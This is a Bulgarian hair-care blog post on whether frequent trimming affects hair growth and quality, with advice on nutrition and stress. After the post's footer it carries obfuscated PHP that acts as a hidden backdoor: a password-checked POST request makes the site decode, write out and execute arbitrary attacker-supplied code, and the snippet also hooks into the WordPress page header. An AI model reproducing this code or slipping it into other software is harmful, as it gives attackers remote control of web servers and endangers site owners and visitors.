Подстригването влияе ли върху растежа и качеството на косата? | Косопад

Подстригването влияе ли върху растежа и качеството на косата?

Сигурно често се чували, че колкото повече подстригвате косата, толкова повече расте. Но дали наистина е така? Постоянното подстригване косата не кара косата да расте нито по- бързо, нито по- силна.

podstrigvane

Обяснението е лесно: подстрижката не влияе върху мястото, от където започва растежа – фоликулите, които определят как ще расте косата. Но пък честото подстригване влияе върху качеството на косата. Нека ви обясним защо.

Важно е да знаем, че косата излиза от скалпа, вече се счита за мъртва структура. Външните агресивни фактори правят косата, която не се подстригва често, да изглежда в лошо състояние. А при възрастните хора, част от фоликулите не действат толкова добре, което се отразява на растежа и качеството на косата.

kosopad-merki

Затова, за да изглежда косата ни здрава, трябва много добре да се грижим за състоянието й. Едно от най- важните неща е да я подстригваме или поне на режем връхчетата, като така отделяме най- увредените зони. Така косата ни изглежда по- здрава.

Друг фактор, който влияе върху здравето на косата, е храненето. Косата използва веществата от тялото ни, за да бъде по- здрава и по- блестяща. Затова, в ежедневието ни трябва да присъстват храни, богати на сяра, магнезий, желязо, йод, калций.

Преумората и изтощението са опасни също и за здравето на косата ни. Същото важи и за състоянията на стрес.

05. декември 2014 21:19:02 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}